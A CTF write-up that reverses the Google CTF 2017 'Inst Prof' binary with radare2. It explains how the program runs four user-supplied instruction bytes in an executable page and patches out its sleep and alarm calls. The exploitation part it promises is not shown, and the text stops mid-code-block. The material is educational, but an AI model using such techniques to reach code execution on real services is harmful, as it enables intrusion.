GoogleCTF 2017: Inst Prof 152 (final value)

This was a very enjoyable and well thought out challenge from Google CTF. I'd never participated in a Google CTF before, and my expectations were high in terms of difficulty. Needless to say, I was not disappointed in the difficulty department. About halfway through I began thinking of this challenge as the "Instruction Professor" - as in, x86-64 assembly instruction - due to the inordinate amount of x86 assembly I was manually typing out and grokking.

Despite the extreme low-leveledness of the challenge work, I had tons of fun solving this challenge, and learned quite a bit more about Linux, memory, and myself in the process.

If you're just looking for my solution itself (instead of a journaling of my process), simply click here to jump to the solution. If, however, you'd like a little insight into my thought process and techniques involved, please read on.

I've split this writeup into two parts, Reversing and Pwning.

  • Reversing - In this section I'll go over how I use radare2 to understand how the challenge works. I provide examples and explanations of commands where I can. This section is geared toward those who are less familiar with radare2 or with assembly/reversing in general.

  • Pwning - This section will illustrate how the challenge program was exploited. I'll go over some early strategies and discoveries that were made, as well as what the solution script does in detail.

Reversing the Binary

After firing up the scoreboard on Friday, I saw the lowest point pwn challenge was Inst Prof, so I puzzled briefly over the flavor text and downloaded the binary:

Please help test our new compiler micro-service

Challenge running at inst-prof.ctfcompetition.com:1337


I took a look at some of the details of the binary:

-> % checksec --file ./inst_prof
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   ./inst_prof

-> % file ./inst_prof
./inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, 
for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped

The thing that stood out to me was that PIE (Position Independent Executable) was turned on, and that NX (No eXecute) was set. Undeterred, I proceeded to shift into mad (computer) scientist mode, and started poking the beast.

I went ahead and ran the program to see what it did. It seemed to sleep() for a few seconds before printing ready:

-> % ./inst_prof
initializing prof...ready
[1]    19938 segmentation fault (core dumped)  ./inst_prof.bak

The most immediate thought I had was that I needed to get rid of the sleep(), otherwise playing with the binary would be a pain every time I went to start it up. So that was step 1:

Brain Surgery

I opened the binary with radare2 using r2 -d inst_prof to get a better look at what was happening:

[0x7f6844843d80]> s main
[0x559b6f54c860]> pd 30
            ;-- main:
            ;-- section_end..plt:
            ;-- section..text:
            ;-- main:
            0x559b6f54c860      55             push rbp     ; section 13 va=0x559b6f54c860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
            0x559b6f54c861      488d357c0300.  lea rsi, qword str.initializing_prof... ; 0x559b6f54cbe4 ; "initializing prof..."
            0x559b6f54c868      ba14000000     mov edx, 0x14           ; 20
            0x559b6f54c86d      bf01000000     mov edi, 1
            0x559b6f54c872      4889e5         mov rbp, rsp
            0x559b6f54c875      e836ffffff     call sym.imp.write
            0x559b6f54c87a      4883f814       cmp rax, 0x14           ; 20
        ,=< 0x559b6f54c87e      7407           je 0x559b6f54c887
       .--> 0x559b6f54c880      31ff           xor edi, edi
       ||   0x559b6f54c882      e8a9ffffff     call sym.imp.exit
       |`-> 0x559b6f54c887      bf05000000     mov edi, 5
       |    0x559b6f54c88c      e8afffffff     call sym.imp.sleep
       |    0x559b6f54c891      bf1e000000     mov edi, 0x1e           ; 30
       |    0x559b6f54c896      e835ffffff     call sym.imp.alarm
       |    0x559b6f54c89b      488d35570300.  lea rsi, qword str.ready_n ; 0x559b6f54cbf9 ; "ready\n"
       |    0x559b6f54c8a2      ba06000000     mov edx, 6
       |    0x559b6f54c8a7      bf01000000     mov edi, 1
       |    0x559b6f54c8ac      e8fffeffff     call sym.imp.write
       |    0x559b6f54c8b1      4883f806       cmp rax, 6              ; 6
       `==< 0x559b6f54c8b5      75c9           jne 0x559b6f54c880
            0x559b6f54c8b7      660f1f840000.  nop word [rax + rax]
        .-> 0x559b6f54c8c0      31c0           xor eax, eax
        |   0x559b6f54c8c2      e8f9010000     call sym.do_test
        `=< 0x559b6f54c8c7      ebf7           jmp 0x559b6f54c8c0

s lets you seek to an address (or symbol)

pd # lets you print disassembly of # instructions (from current seek)

Above is the disassembly output of the main function. My eyes were drawn to three lines in particular: the calls to sleep(), alarm(), and do_test().

From past CTF experience I knew that sleep() and alarm() were both used as mild deterrents that could easily be disabled. If we look at the arg0s for both of these functions (in the edi register), we'll see that they're taking five and thirty seconds respectively.

Five seconds was the delay experienced after seeing the initializing prof... message, and indeed we can see above that both the sleep and alarm function calls occur between the writes to STDOUT.

Before moving on to inspecting the do_test function, I performed my first operation:

-> % r2 -w inst_prof
[0x000008c9]> wx 9090909090 @ 0x88c
[0x000008c9]> wx 9090909090 @ 0x896
[0x000008c9]> s main
[0x00000860]> pd 32
            ;-- main:
            ;-- section_end..plt:
            ;-- section..text:
            ;-- main:
            0x00000860      55             push rbp        ; section 13 va=0x00000860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
            0x00000861      488d357c0300.  lea rsi, qword str.initializing_prof... ; 0xbe4 ; "initializing prof..."
            0x00000868      ba14000000     mov edx, 0x14
            0x0000086d      bf01000000     mov edi, 1
            0x00000872      4889e5         mov rbp, rsp
            0x00000875      e836ffffff     call sym.imp.write
            0x0000087a      4883f814       cmp rax, 0x14
        ,=< 0x0000087e      7407           je 0x887
       .--> 0x00000880      31ff           xor edi, edi
       ||   0x00000882      e8a9ffffff     call sym.imp.exit
       |`-> 0x00000887      bf05000000     mov edi, 5
       |    0x0000088c      90             nop
       |    0x0000088d      90             nop
       |    0x0000088e      90             nop
       |    0x0000088f      90             nop
       |    0x00000890      90             nop
       |    0x00000891      bf1e000000     mov edi, 0x1e
       |    0x00000896      90             nop
       |    0x00000897      90             nop
       |    0x00000898      90             nop
       |    0x00000899      90             nop
       |    0x0000089a      90             nop
       |    0x0000089b      488d35570300.  lea rsi, qword str.ready_n  ; 0xbf9 ; "ready\n"
       |    0x000008a2      ba06000000     mov edx, 6
       |    0x000008a7      bf01000000     mov edi, 1
       |    0x000008ac      e8fffeffff     call sym.imp.write
       |    0x000008b1      4883f806       cmp rax, 6
       `==< 0x000008b5      75c9           jne 0x880
            0x000008b7      660f1f840000.  nop word [rax + rax]
        .-> 0x000008c0      31c0           xor eax, eax
        |   0x000008c2      e8f9010000     call sym.do_test
        `=< 0x000008c7      ebf7           jmp 0x8c0

Invoking radare2 with the -w switch opens the binary file in write mode, allowing radare2 to write data to the file.

The wx command is short for write hex, and allows for writing raw bytes to an offset specified by either the current seek or @ a temporary seek offset. Notice that the addresses (left column) no longer represent virtual addresses of a process, but rather offsets into the file on disk.

Then notice that the least significant 12 bits of each address are the same in the file as in the process! This is because the binary is mapped at a page-aligned base address, and with 4 KiB pages the least significant 12 bits of that base are always unset (all 0's), so the offset within the page carries over unchanged.
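A quick way to check this is to mask off the low 12 bits of the runtime addresses from the first disassembly. This is only a small sketch using the addresses from the r2 -d session above; the load base will differ on every run because the binary is position independent.

```python
PAGE_MASK = 0xfff  # low 12 bits: the offset within a 4 KiB page

# Runtime addresses of the two calls, taken from the r2 -d session above.
runtime_sleep_call = 0x559b6f54c88c
runtime_alarm_call = 0x559b6f54c896

# Page-aligned base of the mapping for that particular run.
load_base = runtime_sleep_call & ~PAGE_MASK

print(hex(load_base))                       # 0x559b6f54c000
print(hex(runtime_sleep_call & PAGE_MASK))  # 0x88c
print(hex(runtime_alarm_call & PAGE_MASK))  # 0x896
```

The two masked values are exactly the offsets used with wx.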

We can see that the two commands issued wrote 0x90 five times for each address 0x88c and 0x896, which fully overwrote both the sleep and alarm calls with nops. So now the binary will no longer pause or get the alarm signal sent to it (which may or may not have broken something later down the road).
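For anyone without radare2 at hand, the same patch can be sketched in a few lines of Python. This is an assumed equivalent of the two wx commands, not what I actually ran: nop_out and patch_file are hypothetical helper names, and the offsets are the file offsets of the two call instructions from the disassembly above. Run it on a copy of the binary.

```python
NOP = 0x90

def nop_out(image: bytearray, offset: int, length: int) -> None:
    """Overwrite `length` bytes at `offset` with one-byte nops, in place."""
    image[offset:offset + length] = bytes([NOP]) * length

def patch_file(path: str) -> None:
    """Apply the same two patches as the wx commands to the file at `path`."""
    with open(path, "rb") as f:
        image = bytearray(f.read())
    nop_out(image, 0x88c, 5)  # call sym.imp.sleep (e8 + rel32 = 5 bytes)
    nop_out(image, 0x896, 5)  # call sym.imp.alarm (e8 + rel32 = 5 bytes)
    with open(path, "wb") as f:
        f.write(image)

# Demonstration on an in-memory buffer rather than the real binary:
# mov edi, 5 / call rel32 / first two bytes of mov edi, 0x1e
demo = bytearray(b"\xbf\x05\x00\x00\x00\xe8\xaf\xff\xff\xff\xbf\x1e")
nop_out(demo, 5, 5)
print(demo.hex())  # bf050000009090909090bf1e
```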

Under the Microscope

Now that the speed bumps were removed, it was time to take a look at the do_test function. I took note that the instruction after the call to do_test is an unconditional jmp back to the xor eax, eax just before that same call: an endless loop.

Then I disassembled the function:

[0x562bd0896860]> pd @ sym.do_test
            ;-- do_test:
            0x562bd0896ac0      55             push rbp
            0x562bd0896ac1      31c0           xor eax, eax
            0x562bd0896ac3      4889e5         mov rbp, rsp
            0x562bd0896ac6      4154           push r12
            0x562bd0896ac8      53             push rbx
            0x562bd0896ac9      4883ec10       sub rsp, 0x10
            0x562bd0896acd      e81effffff     call sym.alloc_page
            0x562bd0896ad2      4889c3         mov rbx, rax
            0x562bd0896ad5      488d05240100.  lea rax, qword sym.template ; obj.template ; 0x562bd0896c00
            0x562bd0896adc      488d7b05       lea rdi, qword [rbx + 5] ; 5
            0x562bd0896ae0      488b10         mov rdx, qword [rax]
            0x562bd0896ae3      488913         mov qword [rbx], rdx
            0x562bd0896ae6      8b5008         mov edx, dword [rax + 8] ; [0x8:4]=-1 ; 8
            0x562bd0896ae9      895308         mov dword [rbx + 8], edx
            0x562bd0896aec      0fb7500c       movzx edx, word [rax + 0xc] ; [0xc:2]=0xffff ; 12
            0x562bd0896af0      0fb6400e       movzx eax, byte [rax + 0xe] ; [0xe:1]=255 ; 14
            0x562bd0896af4      6689530c       mov word [rbx + 0xc], dx
            0x562bd0896af8      88430e         mov byte [rbx + 0xe], al
            0x562bd0896afb      e8b0ffffff     call sym.read_inst
            0x562bd0896b00      4889df         mov rdi, rbx
            0x562bd0896b03      e818ffffff     call sym.make_page_executable
            0x562bd0896b08      0f31           rdtsc
            0x562bd0896b0a      48c1e220       shl rdx, 0x20
            0x562bd0896b0e      4989c4         mov r12, rax
            0x562bd0896b11      31c0           xor eax, eax
            0x562bd0896b13      4909d4         or r12, rdx
            0x562bd0896b16      ffd3           call rbx
            0x562bd0896b18      0f31           rdtsc
            0x562bd0896b1a      bf01000000     mov edi, 1
            0x562bd0896b1f      48c1e220       shl rdx, 0x20
            0x562bd0896b23      488d75e8       lea rsi, qword [rbp - 0x18]
            0x562bd0896b27      4809c2         or rdx, rax
            0x562bd0896b2a      4c29e2         sub rdx, r12
            0x562bd0896b2d      488955e8       mov qword [rbp - 0x18], rdx
            0x562bd0896b31      ba08000000     mov edx, 8
            0x562bd0896b36      e875fcffff     call sym.imp.write
            0x562bd0896b3b      4883f808       cmp rax, 8              ; 8
        ,=< 0x562bd0896b3f      7511           jne 0x562bd0896b52
        |   0x562bd0896b41      4889df         mov rdi, rbx
        |   0x562bd0896b44      e8f7feffff     call sym.free_page
        |   0x562bd0896b49      4883c410       add rsp, 0x10
        |   0x562bd0896b4d      5b             pop rbx
        |   0x562bd0896b4e      415c           pop r12
        |   0x562bd0896b50      5d             pop rbp
        |   0x562bd0896b51      c3             ret
        `-> 0x562bd0896b52      31ff           xor edi, edi
            0x562bd0896b54      e8d7fcffff     call sym.imp.exit
            0x562bd0896b59      0f1f80000000.  nop dword [rax]

We can see above in the disassembly the calls that do_test makes: alloc_page, read_inst, make_page_executable, call rbx, write, and free_page. Of particular interest is the call rbx instruction, which comes after the call to make_page_executable. Without digging deeper, my assumption for why the program crashed earlier was that it was expecting me to input x86 instructions (in read_inst) that would get executed (after make_page_executable), which the HERPDERP I had typed definitely was not.

To see if this was right, I needed to look at the three calls before the one to rbx.


First I looked at alloc_page:

[0x5635884f4ac0]> pd @ sym.alloc_page
      |||   ;-- alloc_page:
      |||   0x5635884f49f0      55             push rbp
      |||   0x5635884f49f1      4531c9         xor r9d, r9d
      |||   0x5635884f49f4      41b8ffffffff   mov r8d, 0xffffffff     ; -1
      |||   0x5635884f49fa      b922000000     mov ecx, 0x22           ; '"' ; 34
      |||   0x5635884f49ff      ba03000000     mov edx, 3
      |||   0x5635884f4a04      be00100000     mov esi, 0x1000
      |||   0x5635884f4a09      4889e5         mov rbp, rsp
      |||   0x5635884f4a0c      31ff           xor edi, edi
      |||   0x5635884f4a0e      5d             pop rbp
      ||`=< 0x5635884f4a0f      e9acfdffff     jmp sym.imp.mmap
      ||    0x5635884f4a14      6666662e0f1f.  nop word cs:[rax + rax]

I saw that it sets up a few arguments and then jumps straight to mmap. Looking at the man page for mmap using man 2 mmap revealed the function signature:

       void *mmap(void *addr, size_t length, int prot, int flags,
                  int fd, off_t offset);

as well as some additional information about the parameters, especially the prot parameter, which is supplied as a bitwise OR of the following:

-> % cat /usr/include/bits/mman-linux.h | grep -P '#define\s+PROT'
#define PROT_READ   0x1     /* Page can be read.  */
#define PROT_WRITE  0x2     /* Page can be written.  */
#define PROT_EXEC   0x4     /* Page can be executed.  */
#define PROT_NONE   0x0     /* Page can not be accessed.  */
#define PROT_GROWSDOWN  0x01000000  /* Extend change to start of
#define PROT_GROWSUP    0x02000000  /* Extend change to start of

Since the first six integer arguments on x86-64 Linux (System V AMD64 ABI) are passed in the registers rdi, rsi, rdx, rcx, r8, and r9, in that order, we can see the call to mmap is made as:

mmap(0, 0x1000, PROT_READ | PROT_WRITE, 0x22, 0xffffffff, 0)

This creates a new mapped region of memory that is 0x1000 bytes large, at a starting address chosen by the kernel (addr is 0), that is readable and writable. The start address of the mmaped region is returned in the rax register.
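The flags and fd arguments are easier to read once decoded. The sketch below hard-codes the Linux x86-64 flag values (an assumption that matches the glibc headers quoted above, and chosen so the snippet does not depend on the platform it runs on); decode_flags and to_int32 are hypothetical helper names.

```python
# Linux x86-64 values from <bits/mman-linux.h>, hard-coded on purpose.
MAP_FLAGS = (
    ("MAP_SHARED", 0x01),
    ("MAP_PRIVATE", 0x02),
    ("MAP_FIXED", 0x10),
    ("MAP_ANONYMOUS", 0x20),
)

def decode_flags(flags: int) -> str:
    """Name the mmap flag bits that are set in `flags`."""
    return " | ".join(name for name, bit in MAP_FLAGS if flags & bit)

def to_int32(value: int) -> int:
    """Reinterpret an unsigned 32-bit value as a signed int."""
    return value - (1 << 32) if value & 0x80000000 else value

print(decode_flags(0x22))    # MAP_PRIVATE | MAP_ANONYMOUS
print(to_int32(0xffffffff))  # -1
```

In other words, the page is a private anonymous mapping with no backing file, which is why fd is -1.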

Looking back at the above disassembly of do_test, I saw after the alloc_page that something was occurring before the read_inst call involving something that radare labeled as obj.template.

Before trying to understand the code, I took a look at the obj.template:

[0x5635884f4ac0]> pxq 0x10 @ obj.template
0x5635884f4c00  0x90909000001000b9  0x00c3f77501e98390   ............u...
[0x5635884f4ac0]> pd 8 @ obj.template
            ;-- template:
            0x5635884f4c00      b900100000     mov ecx, 0x1000
        .-> 0x5635884f4c05      90             nop
        |   0x5635884f4c06      90             nop
        |   0x5635884f4c07      90             nop
        |   0x5635884f4c08      90             nop
        |   0x5635884f4c09      83e901         sub ecx, 1
        `=< 0x5635884f4c0c      75f7           jne 0x5635884f4c05
            0x5635884f4c0e      c3             ret

The pxq # command prints # hex quadwords (in little endian) at the offset specified (obj.template in this case).
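Because pxq prints each quadword as a little-endian integer, the bytes appear reversed within each group of eight. A short sketch that turns the two values back into memory order, so they can be matched against the pd output:

```python
import struct

# The two quadwords exactly as pxq printed them.
quadwords = (0x90909000001000b9, 0x00c3f77501e98390)

# "<2Q" packs two unsigned 64-bit values in little-endian order,
# which recovers the bytes as they actually sit in memory.
raw = struct.pack("<2Q", *quadwords)

print(raw.hex())       # b9001000009090909083e90175f7c300
print(raw[5:9].hex())  # 90909090 (the four nops)
```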

Hmm, it looks as if the obj.template is potentially a loop function of some sort. It appears to execute nop four times in a loop which repeats 0x1000 times.

Taking a long look at the assembly which references this obj.template gave me an understanding of what it did with it:

 0x5635884f4acd      e81effffff     call sym.alloc_page
 0x5635884f4ad2      4889c3         mov rbx, rax                ;save addr of new page (from rax)
 0x5635884f4ad5      488d05240100.  lea rax, qword obj.template ;load obj.template addr
 0x5635884f4adc      488d7b05       lea rdi, qword [rbx + 5]    ;seek 5 into new page
 0x5635884f4ae0      488b10         mov rdx, qword [rax]        ;copy first 8 bytes of obj.template
 0x5635884f4ae3      488913         mov qword [rbx], rdx        ;paste them into new page
 0x5635884f4ae6      8b5008         mov edx, dword [rax + 8]    ;copy template bytes 0x8 to 0xb
 0x5635884f4ae9      895308         mov dword [rbx + 8], edx    ;paste into bytes 0x8 to 0xb
 0x5635884f4aec      0fb7500c       movzx edx, word [rax + 0xc] ;copy template bytes 0xc and 0xd
 0x5635884f4af0      0fb6400e       movzx eax, byte [rax + 0xe] ;copy last template byte
 0x5635884f4af4      6689530c       mov word [rbx + 0xc], dx    ;paste template bytes 0xc and 0xd
 0x5635884f4af8      88430e         mov byte [rbx + 0xe], al    ;paste last template byte (0xe)
 0x5635884f4afb      e8b0ffffff     call sym.read_inst

If that was still unclear, essentially the template bytes are copied into the start of the newly allocated page we got from alloc_page.
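The copy is done in four moves of 8, 4, 2, and 1 bytes, which together cover all 15 bytes of the template. A rough Python model of that sequence, with the template bytes taken from the pd output above (the variable names are mine, not from the binary):

```python
TEMPLATE = bytes.fromhex("b9001000009090909083e90175f7c3")  # 15 bytes

page = bytearray(0x1000)  # fresh anonymous page: zero-filled
offset = 0
for size in (8, 4, 2, 1):  # qword, dword, word, byte moves
    page[offset:offset + size] = TEMPLATE[offset:offset + size]
    offset += size

print(offset)            # 15
print(page[:16].hex())   # b9001000009090909083e90175f7c300
```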

Up to this point I'd only been taking a look at the code statically; however, I decided to run it to check my understanding. I ran the code after setting breakpoints on both the alloc_page and read_inst calls:

[0x5635884f4ac0]> db 0x5635884f4acd
[0x5635884f4ac0]> db 0x5635884f4afb
[0x5635884f4ac0]> dc
Selecting and continuing: 2864
initializing prof...ready
hit breakpoint at: 5635884f4acd
[0x5635884f4acd]> dr rax
[0x5635884f4acd]> dso
hit breakpoint at: 5635884f4ad2
[0x5635884f4acd]> dr rax
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000  0x0000000000000000  0x0000000000000000   ................
[0x5635884f4acd]> dc
Selecting and continuing: 2864
hit breakpoint at: 5635884f4afb
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000  0x90909000001000b9  0x00c3f77501e98390   ............u...

db is the debug breakpoint command; dc is the debug continue command

dr is the debug register command; dso is the debug step over command

From the above output I verified that the obj.template data was copied into the region mapped by alloc_page, and the dm (debug memory [map]) command showed me that a new page had been mapped for the process (the 4K rw- region at 0x00007f0f9b91c000, tagged rbx):

[0x5635884f4acd]> dm
sys   4K 0x00005635884f4000 * 0x00005635884f5000 s -r-x  /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._r_x
sys   4K 0x00005635886f5000 - 0x00005635886f6000 s -r--  /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._rw_
sys   4K 0x00005635886f6000 - 0x00005635886f7000 s -rw-  /googleCTF_06-2017/pwn_inst-prof/inst_prof ; obj._GLOBAL_OFFSET_TABLE_
sys 1.6M 0x00007f0f9b357000 - 0x00007f0f9b4f2000 s -r-x /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 2.0M 0x00007f0f9b4f2000 - 0x00007f0f9b6f1000 s ---- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys  16K 0x00007f0f9b6f1000 - 0x00007f0f9b6f5000 s -r-- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys   8K 0x00007f0f9b6f5000 - 0x00007f0f9b6f7000 s -rw- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys  16K 0x00007f0f9b6f7000 - 0x00007f0f9b6fb000 s -rw- unk0 unk0
sys 140K 0x00007f0f9b6fb000 - 0x00007f0f9b71e000 s -r-x /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._r_x
sys   8K 0x00007f0f9b8cc000 - 0x00007f0f9b8ce000 s -rw- unk1 unk1
sys   4K 0x00007f0f9b91c000 - 0x00007f0f9b91d000 s -rw- unk2 unk2 ; rbx
sys   4K 0x00007f0f9b91d000 - 0x00007f0f9b91e000 s -r-- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._rw_
sys   4K 0x00007f0f9b91e000 - 0x00007f0f9b91f000 s -rw- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so
sys   4K 0x00007f0f9b91f000 - 0x00007f0f9b920000 s -rw- unk3 unk3 ; map.unk0._rw_
sys 132K 0x00007ffc046ac000 - 0x00007ffc046cd000 s -rw- [stack] [stack] ; map._stack_._rw_
sys   8K 0x00007ffc0479e000 - 0x00007ffc047a0000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys   8K 0x00007ffc047a0000 - 0x00007ffc047a2000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys   4K 0xffffffffff600000 - 0xffffffffff601000 s -r-x [vsyscall] [vsyscall] ; map._vsyscall_._r_x

So far, so good. Now I just had to look at and understand the remaining two functions in do_test: read_inst and make_page_executable.

Instruct Radare

[0x562e80db3ab0]> pd 6 @ sym.read_inst 
/ (fcn) sym.read_inst 63
|   sym.read_inst ();
|       |      ; CALL XREF from 0x562e80db3afb (sym.do_test)
|       |   0x562e80db3ab0      55             push rbp
|       |   0x562e80db3ab1      be04000000     mov esi, 4
|       |   0x562e80db3ab6      4889e5         mov rbp, rsp
|       |   0x562e80db3ab9      5d             pop rbp
\       `=< 0x562e80db3aba      e9c1ffffff     jmp sym.read_n
            0x562e80db3abf      90             nop
[0x562e80db3ab0]> pd @ sym.read_n
        .-> ;-- read_n:
|              ; JMP XREF from 0x562e80db3aba (sym.read_inst)
|       .-> 0x562e80db3a80      55             push rbp
|       |   0x562e80db3a81      4885f6         test rsi, rsi
|       |   0x562e80db3a84      4889e5         mov rbp, rsp
|       |   0x562e80db3a87      4154           push r12
|       |   0x562e80db3a89      4c8d2437       lea r12, qword [rdi + rsi]
|       |   0x562e80db3a8d      53             push rbx
|       |   0x562e80db3a8e      4889fb         mov rbx, rdi
|      ,==< 0x562e80db3a91      7418           je 0x562e80db3aab
|      ||   0x562e80db3a93      0f1f440000     nop dword [rax + rax]
|     .---> 0x562e80db3a98      31c0           xor eax, eax
|     |||   0x562e80db3a9a      4883c301       add rbx, 1
|     |||   0x562e80db3a9e      e8adffffff     call sym.read_byte      ; ssize_t read(int fildes, void *buf, size_t nbyte)
|     |||   0x562e80db3aa3      8843ff         mov byte [rbx - 1], al
|     |||   0x562e80db3aa6      4c39e3         cmp rbx, r12
|     `===< 0x562e80db3aa9      75ed           jne 0x562e80db3a98
|      `--> 0x562e80db3aab      5b             pop rbx
|       |   0x562e80db3aac      415c           pop r12
|       |   0x562e80db3aae      5d             pop rbp
|       |   0x562e80db3aaf      c3             ret

We can see from the disassembly of read_inst above that the value of 4 is passed via the rsi register to read_n.

In the read_n function, rsi is immediately tested, which would set the ZF flag if it were 0 and short-circuit the function via the je at address 0x562e80db3a91. In our case it's always 4, so the value is combined with rdi by the instruction lea r12, qword [rdi + rsi], giving the address one past the last byte to fill.

r12 is compared against rbx before the jne at 0x562e80db3aa9. rbx starts at rdi and is incremented once per call to sym.read_byte, so r12 acts as the end marker for the loop: the function returns once the number of bytes passed via rsi (0x4 in our case) has been read.

Looking at the read_byte function reveals:

[0x562e80db3ab0]> pd @ sym.read_byte
/ (fcn) sym.read_byte 47
|   sym.read_byte ();
|           ; var int local_1h @ rbp-0x1
|              ; CALL XREF from 0x562e80db3a9e (sym.read_inst)
|           0x562e80db3a50      55             push rbp
|           0x562e80db3a51      31ff           xor edi, edi
|           0x562e80db3a53      ba01000000     mov edx, 1
|           0x562e80db3a58      4889e5         mov rbp, rsp
|           0x562e80db3a5b      4883ec10       sub rsp, 0x10
|           0x562e80db3a5f      488d75ff       lea rsi, qword [local_1h]
|           0x562e80db3a63      c645ff00       mov byte [local_1h], 0
|           0x562e80db3a67      e874fdffff     call sym.imp.read       ; ssize_t read(int fildes, void *buf, size_t nbyte)
|           0x562e80db3a6c      4883f801       cmp rax, 1              ; 1
|       ,=< 0x562e80db3a70      7506           jne 0x562e80db3a78
|       |   0x562e80db3a72      0fb645ff       movzx eax, byte [local_1h]
|       |   0x562e80db3a76      c9             leave
|       |   0x562e80db3a77      c3             ret
|       `-> 0x562e80db3a78      31ff           xor edi, edi
\           0x562e80db3a7a      e8b1fdffff     call sym.imp.exit       ; void exit(int status)
            0x562e80db3a7f      90             nop

Here we finally see the call to sym.imp.read which is the libc function call which reads from STDIN a number of bytes.

I set a breakpoint on the call to sym.imp.read to see what its parameters were:

[0x562e80db3ab0]> db 0x562e80db3a67
[0x562e80db3a67]> pd 1
|           ;-- rip:
|           0x562e80db3a67 b    e874fdffff     call sym.imp.read       ; ssize_t read(int fildes, void *buf, size_t nbyte)
[0x562e80db3a67]> dr rdi; dr rsi; dr rdx

We can see that it's reading from fd 0 (file descriptor 0) which is STDIN. It's reading into memory address 0x7ffd632550af, and reading only a single byte.

After reading a single character from STDIN, it returns the character in eax, which read_n writes to [rbx - 1].
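Putting read_byte and read_n together, the logic can be modelled in Python roughly as follows. This is a sketch of my reading of the disassembly, with an io.BytesIO standing in for STDIN and a bytearray standing in for the mapped page; the start offset of 5 comes from the lea rdi, [rbx + 5] in do_test.

```python
import io

def read_byte(stream) -> int:
    """Model of read_byte: read exactly one byte or bail out."""
    data = stream.read(1)
    if len(data) != 1:
        raise SystemExit(0)  # the binary calls exit(0) on a short read
    return data[0]

def read_n(page: bytearray, start: int, n: int, stream) -> None:
    """Model of read_n: fill page[start:start+n] one byte at a time."""
    cur = start      # rbx = rdi
    end = start + n  # r12 = rdi + rsi
    if n == 0:       # test rsi, rsi / je
        return
    while True:
        cur += 1                           # add rbx, 1
        page[cur - 1] = read_byte(stream)  # mov byte [rbx - 1], al
        if cur == end:                     # cmp rbx, r12 / jne
            break

page = bytearray(16)
read_n(page, 5, 4, io.BytesIO(b"\xc3\xc3\xc3\xc3"))
print(page.hex())  # 0000000000c3c3c3c300000000000000
```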

I let the process run 4 times, sending 0xc3 each time, and stepped back until I was at do_test, where I found that the 4 bytes are read into the copied obj.template, which is currently stored at the address in rbx:

[0x55cc2a53eaf8]> pd 8 @ rbx
            ;-- map.unk2._rw_:
            ;-- rbx:
            0x7feffd3ea000      b900100000     mov ecx, 0x1000
        ,=> 0x7feffd3ea005      c3             ret
        |   0x7feffd3ea006      c3             ret
        |   0x7feffd3ea007      c3             ret
        |   0x7feffd3ea008      c3             ret
        |   0x7feffd3ea009      83e901         sub ecx, 1
        `-< 0x7feffd3ea00c      75f7           jne 0x7feffd3ea005
            0x7feffd3ea00e      c3             ret

Notice that the 4 nop instructions from the template were overwritten with the bytes I supplied (0xc3 in this case).

Feeling comfortable that I understood everything so far, I took a look at make_page_executable.

It'll Give You Wings

Looking at do_test, we see just prior to calling make_page_executable, that our copied template section stored in rbx is moved into rdi:

[0x55cc2a53eb00]> pd 2
|           ;-- rip:
|           0x55cc2a53eb00      4889df         mov rdi, rbx
|           0x55cc2a53eb03      e818ffffff     call sym.make_page_executable

Then when we look at make_page_executable:

[0x55cc2a53eb00]> pd @ sym.make_page_executable 
/ (fcn) sym.make_page_executable 20
|   sym.make_page_executable ();
|      ||      ; CALL XREF from 0x55cc2a53eb03 (sym.do_test)
|      ||   0x55cc2a53ea20      55             push rbp
|      ||   0x55cc2a53ea21      ba05000000     mov edx, 5
|      ||   0x55cc2a53ea26      be00100000     mov esi, 0x1000
|      ||   0x55cc2a53ea2b      4889e5         mov rbp, rsp
|      ||   0x55cc2a53ea2e      5d             pop rbp
\      `==< 0x55cc2a53ea2f      e9ecfdffff     jmp sym.imp.mprotect

We see that it is just a wrapper around mprotect, which has the signature:

int mprotect(void *addr, size_t len, int prot)

This wrapped call to mprotect uses the address in rdi (our copied template with 4 custom instruction bytes) as the target address. len is set via rsi being 0x1000 which is a 4k page, and prot is set via rdx being set to 0x05, which marks the region as readable and executable.
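The prot values map directly onto the permission strings in the dm output. A tiny sketch (prot_to_str is a hypothetical helper) that renders the value used by alloc_page and the one used by make_page_executable:

```python
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4

def prot_to_str(prot: int) -> str:
    """Render a prot value the way a memory map prints permissions."""
    return (("r" if prot & PROT_READ else "-") +
            ("w" if prot & PROT_WRITE else "-") +
            ("x" if prot & PROT_EXEC else "-"))

print(prot_to_str(0x3))  # rw-  (alloc_page / mmap)
print(prot_to_str(0x5))  # r-x  (make_page_executable / mprotect)
```

Note that the page is never writable and executable at the same time: by the time our four bytes run, the page they live in can no longer be written to.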

Back in do_test, we see that rbx (which also holds the address to our copied template) is directly called, which will execute our 4 bytes worth of instructions in a 0x1000 loop before returning.

Once this is done, do_test takes a second rdtsc reading, subtracts the reading it saved in r12 before the call, and sends the 8-byte difference to STDOUT with write. I didn't pay this much attention while solving the challenge, and would only later learn that I could have used this functionality to leak data from the process.
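On the client side, each iteration therefore answers with 8 raw bytes holding a little-endian 64-bit cycle count. A minimal sketch of how that value is built and how it could be decoded; the sample register values are made up, and combine_tsc and parse_timing are hypothetical helper names:

```python
import struct

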